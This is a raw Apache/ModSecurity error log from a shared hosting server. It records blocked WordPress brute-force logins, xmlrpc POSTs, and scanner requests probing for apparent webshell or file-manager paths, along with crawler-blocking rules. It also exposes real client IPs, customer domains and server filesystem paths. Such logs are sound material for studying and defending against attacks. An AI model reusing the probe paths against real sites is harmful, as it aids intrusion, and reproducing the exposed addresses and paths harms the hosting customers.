[Tue May 26 18:50:30.628796 2026] [security2:error] [pid 1025417:tid 1025642] [client 46.243.173.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeHlHbArxonFeMXvQ4bgAAAF8"]
[Tue May 26 18:50:30.957716 2026] [security2:error] [pid 1025417:tid 1025641] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeHlHbArxonFeMXvQ4egAAAF4"]
[Tue May 26 18:50:32.607964 2026] [security2:error] [pid 1025417:tid 1025493] [remote 123.30.233.13:42024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeIFHbArxonFeMXvQ4qgAAcks"]
[Tue May 26 18:50:32.654700 2026] [core:error] [pid 1025417:tid 1025608] [client 165.22.91.25:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:50:32.654714 2026] [core:error] [pid 1025417:tid 1025608] [client 165.22.91.25:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:50:33.125038 2026] [security2:error] [pid 1025417:tid 1025641] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeIFHbArxonFeMXvQ4ugAAAF4"]
[Tue May 26 18:50:33.296656 2026] [security2:error] [pid 1025417:tid 1025528] [remote 123.30.233.13:42024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeIVHbArxonFeMXvQ4yAAAVm4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:50:33.597447 2026] [fcgid:warn] [pid 1025417:tid 1025576] (70014)End of file found: [client 66.132.186.170:8542] mod_fcgid: can't get data from http client
[Tue May 26 18:50:34.904678 2026] [security2:error] [pid 1025417:tid 1025514] [remote 5.42.158.148:33242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWeIlHbArxonFeMXvQ49gAAeGA"]
[Tue May 26 18:50:35.598206 2026] [security2:error] [pid 1025417:tid 1025664] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeI1HbArxonFeMXvQ5BAAAAHU"]
[Tue May 26 18:50:36.493349 2026] [core:error] [pid 1025417:tid 1025567] [client 165.22.91.25:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://webmail.ucdc.co.in/
[Tue May 26 18:50:36.493369 2026] [core:error] [pid 1025417:tid 1025567] [client 165.22.91.25:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://webmail.ucdc.co.in/
[Tue May 26 18:50:37.076734 2026] [security2:error] [pid 1025417:tid 1025521] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeJFHbArxonFeMXvQ5LgAAQWc"]
[Tue May 26 18:50:37.077019 2026] [security2:error] [pid 1025417:tid 1025612] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeJFHbArxonFeMXvQ5LgAAQWc"]
[Tue May 26 18:50:37.794550 2026] [security2:error] [pid 1025417:tid 1025561] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeJVHbArxonFeMXvQ5PQAAAA4"]
[Tue May 26 18:50:39.283843 2026] [security2:error] [pid 1025417:tid 1025588] [client 63.178.84.147:64592] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWeJ1HbArxonFeMXvQ5ZQAAACk"], referer: http://ucdc.co.in/
[Tue May 26 18:50:39.729392 2026] [security2:error] [pid 1025417:tid 1025642] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeJ1HbArxonFeMXvQ5awAAAF8"]
[Tue May 26 18:50:42.651214 2026] [security2:error] [pid 1025417:tid 1025561] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeKlHbArxonFeMXvQ5tAAAAA4"]
[Tue May 26 18:50:43.924856 2026] [security2:error] [pid 1025417:tid 1025422] [remote 103.216.118.192:32790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.118.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWeK1HbArxonFeMXvQ53AAAKwQ"]
[Tue May 26 18:50:44.945696 2026] [security2:error] [pid 1025417:tid 1025566] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeLFHbArxonFeMXvQ5-AAAABM"]
[Tue May 26 18:50:46.152107 2026] [security2:error] [pid 1025417:tid 1025462] [remote 103.216.118.192:32790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.118.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWeLlHbArxonFeMXvQ6SgAAayw"], referer: https://preetishah.com/wp-login.php
[Tue May 26 18:50:46.440302 2026] [autoindex:error] [pid 1025417:tid 1025605] [client 91.98.176.8:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 18:50:46.444924 2026] [security2:error] [pid 1025417:tid 1025611] [client 91.98.176.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWeLlHbArxonFeMXvQ6bwAAAEA"], referer: https://www.ucdc.co.in/
[Tue May 26 18:50:46.495394 2026] [security2:error] [pid 1025417:tid 1025477] [remote 74.7.241.58:46890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWeLlHbArxonFeMXvQ6cAAADDs"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/mailchimp-for-wp/integrations/gravity-forms
[Tue May 26 18:50:46.783158 2026] [security2:error] [pid 1025417:tid 1025634] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeLlHbArxonFeMXvQ6WwAAAFc"]
[Tue May 26 18:50:46.994160 2026] [autoindex:error] [pid 1025417:tid 1025557] [client 91.98.176.8:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 18:50:47.526908 2026] [security2:error] [pid 1025417:tid 1025480] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeL1HbArxonFeMXvQ6jwAAfT4"]
[Tue May 26 18:50:47.527086 2026] [security2:error] [pid 1025417:tid 1025672] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeL1HbArxonFeMXvQ6jwAAfT4"]
[Tue May 26 18:50:49.004350 2026] [security2:error] [pid 1025417:tid 1025561] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeMFHbArxonFeMXvQ6mwAAAA4"]
[Tue May 26 18:50:51.368996 2026] [http2:info] [pid 1036960:tid 1036960] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 18:50:51.711444 2026] [security2:error] [pid 1036960:tid 1037078] [remote 193.42.61.12:47284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWeM4GNKXNii6nttH9IDQAAhXU"]
[Tue May 26 18:50:51.874595 2026] [security2:error] [pid 1036960:tid 1037111] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeM4GNKXNii6nttH9ICQAAAJo"]
[Tue May 26 18:50:53.053609 2026] [security2:error] [pid 1036960:tid 1036964] [remote 129.121.76.191:58400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWeNIGNKXNii6nttH9IKgAA1wM"]
[Tue May 26 18:50:53.224289 2026] [security2:error] [pid 1036960:tid 1036965] [remote 129.121.76.191:58400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWeNYGNKXNii6nttH9INgAA3AQ"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:50:53.668904 2026] [security2:error] [pid 1036960:tid 1037203] [client 4.204.194.158:33186] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.194.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.jhonparra.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWeNYGNKXNii6nttH9IRwAAAPY"]
[Tue May 26 18:50:53.669149 2026] [security2:error] [pid 1036960:tid 1037203] [client 4.204.194.158:33186] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.jhonparra.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWeNYGNKXNii6nttH9IRwAAAPY"]
[Tue May 26 18:50:53.779332 2026] [security2:error] [pid 1036960:tid 1037176] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeNYGNKXNii6nttH9IOwAAANs"]
[Tue May 26 18:50:55.807733 2026] [security2:error] [pid 1036960:tid 1037184] [client 4.204.194.158:33171] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.194.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.jhonparra.com"] [uri "/aaa.php"] [unique_id "ahWeN4GNKXNii6nttH9IfQAAAOM"]
[Tue May 26 18:50:55.807837 2026] [security2:error] [pid 1036960:tid 1037184] [client 4.204.194.158:33171] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.jhonparra.com"] [uri "/aaa.php"] [unique_id "ahWeN4GNKXNii6nttH9IfQAAAOM"]
[Tue May 26 18:50:55.908916 2026] [security2:error] [pid 1036960:tid 1037172] [client 91.105.236.210:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeN4GNKXNii6nttH9IcwAAANc"]
[Tue May 26 18:50:56.714020 2026] [security2:error] [pid 1036960:tid 1037203] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeOIGNKXNii6nttH9IhQAAAPY"]
[Tue May 26 18:50:57.861774 2026] [security2:error] [pid 1036960:tid 1037118] [client 185.231.155.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWeOYGNKXNii6nttH9IoQAAAKE"], referer: http://anujtradingco.com/homepages/portfolio-photo/
[Tue May 26 18:50:58.136190 2026] [security2:error] [pid 1036960:tid 1037129] [client 4.204.194.158:33180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.194.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.jhonparra.com"] [uri "/admin.php"] [unique_id "ahWeOoGNKXNii6nttH9IsQAAAKw"]
[Tue May 26 18:50:58.136327 2026] [security2:error] [pid 1036960:tid 1037129] [client 4.204.194.158:33180] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.jhonparra.com"] [uri "/admin.php"] [unique_id "ahWeOoGNKXNii6nttH9IsQAAAKw"]
[Tue May 26 18:50:58.395140 2026] [security2:error] [pid 1036960:tid 1037087] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeOoGNKXNii6nttH9ItQAAtn4"]
[Tue May 26 18:50:58.395337 2026] [security2:error] [pid 1036960:tid 1037139] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeOoGNKXNii6nttH9ItQAAtn4"]
[Tue May 26 18:50:59.001105 2026] [security2:error] [pid 1036960:tid 1037162] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeOoGNKXNii6nttH9IvgAAAM0"]
[Tue May 26 18:50:59.908547 2026] [security2:error] [pid 1036960:tid 1037129] [client 4.204.194.158:33208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.194.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.jhonparra.com"] [uri "/wp-includes/Text/Diff/index.php"] [unique_id "ahWeO4GNKXNii6nttH9I4QAAAKw"]
[Tue May 26 18:50:59.908667 2026] [security2:error] [pid 1036960:tid 1037129] [client 4.204.194.158:33208] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.jhonparra.com"] [uri "/wp-includes/Text/Diff/index.php"] [unique_id "ahWeO4GNKXNii6nttH9I4QAAAKw"]
[Tue May 26 18:51:01.461517 2026] [security2:error] [pid 1036960:tid 1037175] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWePIGNKXNii6nttH9I9AAAANo"]
[Tue May 26 18:51:02.426019 2026] [security2:error] [pid 1036960:tid 1037101] [client 4.204.194.158:33149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.194.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.jhonparra.com"] [uri "/aa.php"] [unique_id "ahWePoGNKXNii6nttH9JFQAAAJA"]
[Tue May 26 18:51:02.426164 2026] [security2:error] [pid 1036960:tid 1037101] [client 4.204.194.158:33149] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.jhonparra.com"] [uri "/aa.php"] [unique_id "ahWePoGNKXNii6nttH9JFQAAAJA"]
[Tue May 26 18:51:02.776588 2026] [security2:error] [pid 1036960:tid 1037116] [client 104.28.119.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWePoGNKXNii6nttH9JGwAAAJ8"]
[Tue May 26 18:51:03.113138 2026] [security2:error] [pid 1036960:tid 1037103] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWePoGNKXNii6nttH9JIAAAAJI"]
[Tue May 26 18:51:03.684378 2026] [security2:error] [pid 1036960:tid 1037205] [client 4.204.194.158:33142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.194.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.jhonparra.com"] [uri "/server.php"] [unique_id "ahWeP4GNKXNii6nttH9JMgAAAPg"]
[Tue May 26 18:51:03.684518 2026] [security2:error] [pid 1036960:tid 1037205] [client 4.204.194.158:33142] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.jhonparra.com"] [uri "/server.php"] [unique_id "ahWeP4GNKXNii6nttH9JMgAAAPg"]
[Tue May 26 18:51:05.211948 2026] [security2:error] [pid 1036960:tid 1037165] [client 110.249.202.219:19818] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.karuppuswamykovil.in"] [uri "/robots.txt"] [unique_id "ahWeQYGNKXNii6nttH9JSwAAANA"]
[Tue May 26 18:51:05.557172 2026] [security2:error] [pid 1036960:tid 1037194] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeQYGNKXNii6nttH9JRwAAAO0"]
[Tue May 26 18:51:05.864375 2026] [security2:error] [pid 1036960:tid 1037141] [client 114.119.156.102:41835] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "toronto121mortgage.com"] [uri "/upload/files/98884-lekarstvennye-sredstva-pri-hronicheskom-cistite.xml"] [unique_id "ahWeQYGNKXNii6nttH9JYwAAALg"], referer: https://phuquocjeeptour.com/images/pic/9216-instillyacii-pri-lechenii-cistita-u-zhenschin.xml
[Tue May 26 18:51:07.879131 2026] [security2:error] [pid 1036960:tid 1037094] [client 66.249.70.139:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.triviewsolutions.com"] [uri "/index.php"] [unique_id "ahWeQ4GNKXNii6nttH9JjgAAAIk"]
[Tue May 26 18:51:07.956441 2026] [security2:error] [pid 1036960:tid 1037176] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeQ4GNKXNii6nttH9JlwAAANs"]
[Tue May 26 18:51:09.255501 2026] [security2:error] [pid 1036960:tid 1037006] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeRYGNKXNii6nttH9JvwAAyy0"]
[Tue May 26 18:51:09.255752 2026] [security2:error] [pid 1036960:tid 1037160] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeRYGNKXNii6nttH9JvwAAyy0"]
[Tue May 26 18:51:09.886577 2026] [security2:error] [pid 1036960:tid 1037197] [client 45.154.98.150:53744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWeRYGNKXNii6nttH9JyQAAAPA"], referer: www.google.com
[Tue May 26 18:51:09.897312 2026] [security2:error] [pid 1036960:tid 1037194] [client 45.154.98.150:55172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-plain.php"] [unique_id "ahWeRYGNKXNii6nttH9JzwAAAO0"], referer: www.google.com
